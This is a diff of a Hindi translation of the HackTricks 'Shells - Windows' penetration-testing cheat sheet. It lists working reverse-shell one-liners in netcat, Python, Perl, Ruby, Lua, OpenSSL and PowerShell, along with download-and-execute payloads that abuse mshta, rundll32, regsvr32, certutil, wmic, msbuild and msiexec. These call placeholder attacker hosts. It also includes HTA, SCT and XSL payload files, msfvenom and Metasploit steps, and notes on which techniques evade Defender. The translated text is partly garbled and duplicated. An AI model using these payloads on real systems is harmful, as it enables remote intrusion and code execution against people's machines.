* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# Shells - Windows
|
||||
# शैल्स - विंडोज
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
**ट्राई हार्ड सिक्योरिटी ग्रुप**
|
||||
|
||||
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
|
@ -25,18 +26,15 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
## Lolbas
|
||||
|
||||
पृष्ठ [lolbas-project.github.io](https://lolbas-project.github.io/) विंडोज के लिए है जैसे [https://gtfobins.github.io/](https://gtfobins.github.io/) लिनक्स के लिए है।\
|
||||
स्वाभाविक रूप से, **विंडोज में SUID फ़ाइलें या सुडो विशेषाधिकार नहीं हैं**, लेकिन यह उपयोगी है जानने के लिए **कैसे** कुछ **बाइनरी** (अ)दुरुपयोग किया जा सकता है कुछ अप्रत्याशित क्रियाएँ करने के लिए जैसे **कोड का अभिव्यक्ति करें।**
|
||||
स्वाभाविक रूप से, **विंडोज में SUID फ़ाइलें या सुडो विशेषाधिकार नहीं हैं**, लेकिन यह उपयोगी है जानने के लिए **कैसे** कुछ **बाइनरी** (अब)युक्त किए जा सकते हैं कुछ प्रकार की अप्रत्याशित क्रियाएँ करने के लिए जैसे **कोड का विचार करें।**
|
||||
|
||||
## NC
|
||||
|
||||
```bash
|
||||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||||
```
|
||||
|
||||
## SBD
|
||||
|
||||
[**sbd**](https://www.kali.org/tools/sbd/) **एक पोर्टेबल और सुरक्षित Netcat विकल्प है**। यह Unix जैसे सिस्टम और Win32 पर काम करता है। मजबूत एन्क्रिप्शन, प्रोग्राम निष्पादन, अनुकूलनीय स्रोत पोर्ट, और निरंतर पुनर्संबंधन जैसी विशेषताओं के साथ, sbd TCP/IP संचार के लिए एक बहुमुखी समाधान प्रदान करता है। Windows उपयोगकर्ताओं के लिए, Kali Linux वितरण से sbd.exe संस्करण को Netcat के लिए एक विश्वसनीय प्रतिस्थापन के रूप में उपयोग किया जा सकता है।
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/) एक पोर्टेबल और सुरक्षित Netcat विकल्प है**। यह Unix जैसे सिस्टम और Win32 पर काम करता है। मजबूत एन्क्रिप्शन, प्रोग्राम निष्पादन, अनुकूलनीय स्रोत पोर्ट, और निरंतर पुनर्संधि जैसी विशेषताओं के साथ, sbd TCP/IP संचार के लिए एक बहुमुखी समाधान प्रदान करता है। Windows उपयोगकर्ताओं के लिए, Kali Linux वितरण से sbd.exe संस्करण को Netcat के लिए एक विश्वसनीय प्रतिस्थापन के रूप में उपयोग किया जा सकता है।
|
||||
```bash
|
||||
# Victims machine
|
||||
sbd -l -p 4444 -e bash -v -n
|
||||
|
@ -48,48 +46,48 @@ sbd 10.10.10.10 4444
|
|||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
## पायथन
|
||||
|
||||
```bash
|
||||
#Windows
|
||||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
|
||||
## पर्ल
|
||||
|
||||
```bash
|
||||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
|
||||
## रूबी
|
||||
|
||||
```bash
|
||||
#Windows
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
|
||||
## लुआ
|
||||
|
||||
```bash
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
||||
## OpenSSH
|
||||
|
||||
हम एक नए विंडोज शेल के लिए एक नए सत्र खोलेंगे। इसके लिए, हम एक नए सत्र खोलने के लिए निम्नलिखित कमांड का उपयोग करेंगे:
|
||||
|
||||
हमलावर (काली)
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
### Windows Command Shells
|
||||
|
||||
### Victim
|
||||
#### विंडोज कमांड शैल
|
||||
|
||||
शिकार
|
||||
1. **Command Prompt (cmd.exe)**
|
||||
|
||||
यह स्टैंडर्ड विंडोज कमांड लाइन इंटरफेस है।
|
||||
|
||||
2. **PowerShell (powershell.exe)**
|
||||
|
||||
यह एक शक्तिशाली विंडोज कमांड शैल है जिसमें अधिक विस्तृत सुविधाएं हैं।
|
||||
|
||||
3. **Windows Management Instrumentation Command-line (WMIC)**
|
||||
|
||||
यह एक अन्य तरीका है जिसका उपयोग सिस्टम जानकारी को प्राप्त करने और प्रबंधित करने के लिए किया जा सकता है।
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
@ -97,36 +95,27 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
|
|||
#Windows
|
||||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
```
|
||||
|
||||
## Powershell
|
||||
|
||||
## पावरशेल
|
||||
```bash
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||||
```
|
||||
|
||||
जाल कॉल करने वाली प्रक्रिया: **powershell.exe**\
|
||||
डिस्क पर लिखी गई पेलोड: **नहीं** (_कम से कम जहां तक मुझे प्रोसेस मॉनिटरिंग करते समय मिला है!_)
|
||||
|
||||
प्रक्रिया नेटवर्क कॉल कर रही है: **powershell.exe**\
|
||||
डिस्क पर लिखी गई पेलोड: **NO** (_कम से कम कहीं नहीं मिला procmon का उपयोग करके!_)
|
||||
```bash
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
|
||||
**नेटवर्क कॉल करने वाली प्रक्रिया:** **svchost.exe**\
|
||||
**डिस्क पर लिखा गया पेलोड:** **WebDAV क्लाइंट स्थानीय कैश**
|
||||
|
||||
**एक लाइनर:**
|
||||
```bash
|
||||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
**इस दस्तावेज़ के अंत में विभिन्न पावरशेल शैलियों के बारे में अधिक जानकारी प्राप्त करें**
|
||||
**इस दस्तावेज़ के अंत में विभिन्न पावरशेल शैलों के बारे में अधिक जानकारी प्राप्त करें**
|
||||
|
||||
## Mshta
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
||||
```
|
||||
|
@ -138,19 +127,15 @@ mshta http://webserver/payload.hta
|
|||
```bash
|
||||
mshta \\webdavserver\folder\payload.hta
|
||||
```
|
||||
|
||||
#### **hta-psh रिवर्स शैल का उदाहरण (hta का उपयोग करके PS बैकडोर डाउनलोड और चलाना)**
|
||||
|
||||
```xml
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
```
|
||||
|
||||
**आप बहुत आसानी से एक Koadic zombie को stager hta का उपयोग करके डाउनलोड और निष्पादित कर सकते हैं**
|
||||
|
||||
#### hta उदाहरण
|
||||
|
||||
[**यहाँ से**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
|
||||
|
||||
```xml
|
||||
<html>
|
||||
<head>
|
||||
|
@ -165,11 +150,9 @@ new ActiveXObject('WScript.Shell').Run(c);
|
|||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
#### **mshta - sct**
|
||||
|
||||
[**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
|
@ -185,9 +168,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
#### **Mshta - Metasploit**
|
||||
|
||||
```bash
|
||||
use exploit/windows/misc/hta_server
|
||||
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
|
||||
|
@ -198,15 +179,13 @@ msf exploit(windows/misc/hta_server) > exploit
|
|||
```bash
|
||||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
## **Rundll32**
|
||||
|
||||
[**Dll हैलो वर्ल्ड उदाहरण**](https://github.com/carterjones/hello-world-dll)
|
||||
[**Dll hello world उदाहरण**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
||||
```
|
||||
|
@ -214,13 +193,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
|||
```bash
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
**Rundll32 - sct**
|
||||
|
||||
[**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||||
|
||||
```xml
|
||||
<?XML version="1.0"?>
|
||||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||||
|
@ -235,17 +212,13 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|||
</script>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
#### **Rundll32 - Metasploit**
|
||||
|
||||
```bash
|
||||
use windows/smb/smb_delivery
|
||||
run
|
||||
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
|
||||
```
|
||||
|
||||
**Rundll32 - Koadic**
|
||||
|
||||
**Rundll32 - कोडिक**
|
||||
```bash
|
||||
use stager/js/rundll32_js
|
||||
set SRVHOST 192.168.1.107
|
||||
|
@ -254,11 +227,9 @@ run
|
|||
#Koadic will tell you what you need to execute inside the victim, it will be something like:
|
||||
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
|
||||
```
|
||||
|
||||
## Regsvr32
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
||||
```
|
||||
|
@ -266,13 +237,11 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
|||
```
|
||||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
#### Regsvr32 -sct
|
||||
|
||||
[**यहाँ से**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
|
||||
```markup
|
||||
<?XML version="1.0"?>
|
||||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||||
|
@ -289,9 +258,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|||
</registration>
|
||||
</scriptlet>
|
||||
```
|
||||
|
||||
#### **Regsvr32 - Metasploit**
|
||||
|
||||
#### **रेग्सवर32 - मेटास्प्लॉइट**
|
||||
```bash
|
||||
use multi/script/web_delivery
|
||||
set target 3
|
||||
|
@ -300,7 +267,6 @@ set lhost 10.2.0.5
|
|||
run
|
||||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||||
```
|
||||
|
||||
**आप बहुत आसानी से एक Koadic zombie को डाउनलोड और execute कर सकते हैं stager regsvr का उपयोग करके**
|
||||
|
||||
## Certutil
|
||||
|
@ -308,42 +274,32 @@ run
|
|||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
एक B64dll डाउनलोड करें, इसे डीकोड करें और इसे execute करें।
|
||||
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||||
```
|
||||
|
||||
एक B64exe डाउनलोड करें, इसे डीकोड करें और इसे चलाएं।
|
||||
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
## **Cscript/Wscript**
|
||||
|
||||
## **Cscript/Wscript**
|
||||
```bash
|
||||
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
|
||||
```
|
||||
|
||||
**Cscript - Metasploit**
|
||||
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
## PS-Bat
|
||||
|
||||
```bash
|
||||
\\webdavserver\folder\batchfile.bat
|
||||
```
|
||||
|
||||
जांच करने वाली प्रक्रिया: **svchost.exe**\
|
||||
डिस्क पर लिखी गई पेलोड: **WebDAV client local cache**
|
||||
|
||||
जाल संचालन कॉल कर रही प्रक्रिया: **svchost.exe**\
|
||||
डिस्क पर लिखी गई पेलोड: **WebDAV क्लाइंट स्थानीय कैश**
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||||
impacket-smbserver -smb2support kali `pwd`
|
||||
|
@ -352,36 +308,28 @@ impacket-smbserver -smb2support kali `pwd`
|
|||
```bash
|
||||
\\10.8.0.3\kali\shell.bat
|
||||
```
|
||||
|
||||
**डिफेंडर द्वारा पहचाना गया**
|
||||
|
||||
## **MSIExec**
|
||||
|
||||
हमलावर
|
||||
|
||||
हमलावार
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
|
||||
python -m SimpleHTTPServer 80
|
||||
```
|
||||
|
||||
शिकार:
|
||||
|
||||
```
|
||||
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
|
||||
```
|
||||
|
||||
**पहचाना गया**
|
||||
|
||||
## **Wmic**
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
wmic os get /format:"https://webserver/payload.xsl"
|
||||
```
|
||||
|
||||
उदाहरण xsl फ़ाइल [यहाँ से](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
|
||||
|
||||
```xml
|
||||
<?xml version='1.0'?>
|
||||
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
|
||||
|
@ -393,36 +341,29 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
|
|||
</ms:script>
|
||||
</stylesheet>
|
||||
```
|
||||
|
||||
**नहीं पहचाना गया**
|
||||
|
||||
**आप बहुत आसानी से एक Koadic zombie डाउनलोड और एक्जीक्यूट कर सकते हैं उसिंग स्टेजर wmic**
|
||||
**आप बहुत आसानी से एक Koadic zombie को डाउनलोड और एक्जीक्यूट कर सकते हैं उस्ताद wmic का उपयोग करके**
|
||||
|
||||
## Msbuild
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```
|
||||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||||
```
|
||||
|
||||
आप इस तकनीक का उपयोग ऐप्लिकेशन व्हाइटलिस्टिंग और Powershell.exe प्रतिबंधों को अनदेखा करने के लिए कर सकते हैं। जैसे ही आपको एक PS शैल मिलेगा।\
|
||||
बस इसे डाउनलोड करें और इसे निष्पादित करें: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||||
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
|
||||
```
|
||||
**नहीं पहचाना गया**
|
||||
|
||||
**नहीं पहचाना**
|
||||
|
||||
## **CSC**
|
||||
|
||||
विक्टिम मशीन में C# कोड कंपाइल करें।
|
||||
## **सीएससी**
|
||||
|
||||
विक्टिम मशीन में सीशार्प कोड कंपाइल करें।
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
|
||||
```
|
||||
|
||||
आप यहाँ से एक मौलिक C# रिवर्स शैल डाउनलोड कर सकते हैं: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||||
|
||||
**नहीं पता चला**
|
||||
|
@ -430,11 +371,9 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe s
|
|||
## **Regasm/Regsvc**
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
||||
```
|
||||
|
||||
**मैंने इसे प्रयास नहीं किया**
|
||||
|
||||
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
|
||||
|
@ -442,53 +381,44 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\fol
|
|||
## Odbcconf
|
||||
|
||||
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
```bash
|
||||
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
||||
```
|
||||
|
||||
**मैंने इसे प्रयास नहीं किया**
|
||||
|
||||
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
|
||||
|
||||
## Powershell शैल्स
|
||||
## पावरशेल शैल्स
|
||||
|
||||
### PS-Nishang
|
||||
|
||||
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
|
||||
**शैल्स** फ़ोल्डर में, कई विभिन्न शैल्स हैं। डाउनलोड और Invoke-_PowerShellTcp.ps1_ को क्रियान्वित करने के लिए स्क्रिप्ट की एक प्रति बनाएं और फ़ाइल के अंत में जोड़ें:
|
||||
|
||||
**शैल्स** फोल्डर में, कई विभिन्न शैल्स हैं। डाउनलोड और Invoke-_PowerShellTcp.ps1_ को क्रियान्वित करने के लिए स्क्रिप्ट की एक प्रति बनाएं और फ़ाइल के अंत में जोड़ें:
|
||||
```
|
||||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||||
```
|
||||
|
||||
एक वेब सर्वर में स्क्रिप्ट सर्व करना शुरू करें और पीड़ित के अंत में इसे निष्पादित करें:
|
||||
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||||
```
|
||||
|
||||
Defender इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).
|
||||
|
||||
**TODO: अन्य nishang शैल्स की जाँच करें**
|
||||
**TODO: अन्य निशांग शैल्स की जाँच करें**
|
||||
|
||||
### **PS-Powercat**
|
||||
|
||||
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
|
||||
|
||||
डाउनलोड करें, एक वेब सर्वर शुरू करें, सुनने वाला शुरू करें, और पीड़ित के अंत में इसे क्रियान्वित करें:
|
||||
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
|
||||
**डिफेंडर इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).**
|
||||
Defender इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).
|
||||
|
||||
**पावरकैट द्वारा प्रस्तावित अन्य विकल्प:**
|
||||
|
||||
बाइंड शैल, रिवर्स शैल (TCP, UDP, DNS), पोर्ट पुनर्निर्देशन, अपलोड/डाउनलोड, पेलोड उत्पन्न करें, फ़ाइल सर्व करें...
|
||||
|
||||
```
|
||||
Serve a cmd Shell:
|
||||
powercat -l -p 443 -e cmd
|
||||
|
@ -505,17 +435,14 @@ powercat -c 10.1.1.15 -p 443 -e cmd -g
|
|||
Start A Persistent Server That Serves a File:
|
||||
powercat -l -p 443 -i C:\inputfile -rep
|
||||
```
|
||||
|
||||
### इम्पायर
|
||||
|
||||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
